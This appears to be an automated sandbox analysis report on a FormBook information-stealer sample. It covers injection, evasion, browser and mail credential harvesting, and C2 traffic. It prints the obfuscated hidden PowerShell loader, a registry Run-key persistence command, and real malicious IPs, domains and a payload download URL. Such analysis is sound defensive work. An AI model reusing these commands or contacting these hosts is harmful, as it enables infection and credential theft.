Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 4348 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Untapestried.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Untapestried.exe base: 1660000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Untapestried.exe base: 19FFF4 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\160420241245287.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Untapestried.exe "C:\Users\user\AppData\Local\Temp\Untapestried.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)" Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "lgplante" /t reg_expand_sz /d "%divergente% -windowstyle minimized $millibar=(get-itemproperty -path 'hkcu:\ciconiform\').syskerne;%divergente% ($millibar)"
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "lgplante" /t reg_expand_sz /d "%divergente% -windowstyle minimized $millibar=(get-itemproperty -path 'hkcu:\ciconiform\').syskerne;%divergente% ($millibar)" Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_10001112 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GlobalAlloc,GlobalLock,GetVersionExW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatW,GlobalSize,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree, 0_2_10001112
Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405F0C

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1426828 Sample: 160420241245287.exe Startdate: 16/04/2024 Architecture: WINDOWS Score: 100 53 www.eternalsunrise.xyz 2->53 55 www.n-benriya002.com 2->55 57 5 other IPs or domains 2->57 83 Multi AV Scanner detection for domain / URL 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for URL or domain 2->87 91 4 other signatures 2->91 11 160420241245287.exe 2 79 2->11         started        signatures3 89 Performs DNS queries to domains with low reputation 53->89 process4 file5 45 C:\Users\user\AppData\Roaming\...\tailors.ver, DOS 11->45 dropped 47 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 11->47 dropped 49 C:\Users\user\AppData\...\Randrusianeren.Unf, ASCII 11->49 dropped 105 Suspicious powershell command line found 11->105 15 powershell.exe 20 11->15         started        signatures6 process7 file8 51 C:\Users\user\AppData\...\Untapestried.exe, PE32 15->51 dropped 67 Obfuscated command line found 15->67 69 Writes to foreign memory regions 15->69 71 Sample uses process hollowing technique 15->71 73 3 other signatures 15->73 19 Untapestried.exe 2 7 15->19         started        23 conhost.exe 15->23         started        25 cmd.exe 1 15->25         started        signatures9 process10 dnsIp11 59 103.14.155.180, 49736, 80 EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK unknown 19->59 93 Multi AV Scanner detection for dropped file 19->93 95 Machine Learning detection for dropped file 19->95 97 Maps a DLL or memory area into another process 19->97 99 Hides threads from debuggers 19->99 27 bvvgQqxLmFZr.exe 19->27 injected 30 cmd.exe 1 19->30         started        signatures12 process13 signatures14 103 Found direct / indirect Syscall (likely to bypass EDR) 27->103 32 cmd.exe 13 27->32         started        35 conhost.exe 30->35         started        37 reg.exe 1 1 30->37         started        process15 signatures16 75 Tries to steal Mail credentials (via file / registry access) 32->75 77 Tries to harvest and steal browser information (history, passwords, etc) 32->77 79 Modifies the context of a thread in another process (thread injection) 32->79 81 2 other signatures 32->81 39 bvvgQqxLmFZr.exe 32->39 injected 43 firefox.exe 32->43         started        process17 dnsIp18 61 www.eternalsunrise.xyz 66.29.135.159, 49751, 49752, 80 ADVANTAGECOMUS United States 39->61 63 n-benriya002.com 219.94.128.41, 49743, 49744, 49745 SAKURA-CSAKURAInternetIncJP Japan 39->63 65 3 other IPs or domains 39->65 101 Found direct / indirect Syscall (likely to bypass EDR) 39->101 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.14.155.180
 unknown unknown
58451 EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK false
219.94.128.41
 n-benriya002.com Japan 9371 SAKURA-CSAKURAInternetIncJP false
66.29.135.159
 www.eternalsunrise.xyz United States
19538 ADVANTAGECOMUS true
81.88.63.46
 www.scwspark.com Italy
39729 REGISTER-ASIT false
217.160.0.183
 www.jt-berger.store Germany
8560 ONEANDONE-ASBrauerstrasse48DE false
112.175.50.218
 ejbodyart.com Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false

Contacted Domains

Name IP Active
ejbodyart.com 112.175.50.218 true
n-benriya002.com 219.94.128.41 true
www.scwspark.com 81.88.63.46 true
www.jt-berger.store 217.160.0.183 true
www.eternalsunrise.xyz 66.29.135.159 true
www.ejbodyart.com unknown unknown
www.n-benriya002.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.ejbodyart.com/9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= false
    		unknown
    http://www.jt-berger.store/9pdo/ false unknown
    http://www.n-benriya002.com/9pdo/ false unknown
    http://www.jt-berger.store/9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2 false
      		unknown
      http://www.n-benriya002.com/9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2 false
        		unknown
        http://103.14.155.180/CkkRLCTUxW193.bin false unknown
        http://www.scwspark.com/9pdo/ false unknown
        http://www.scwspark.com/9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2 false
          		unknown
          http://www.eternalsunrise.xyz/9pdo/ false unknown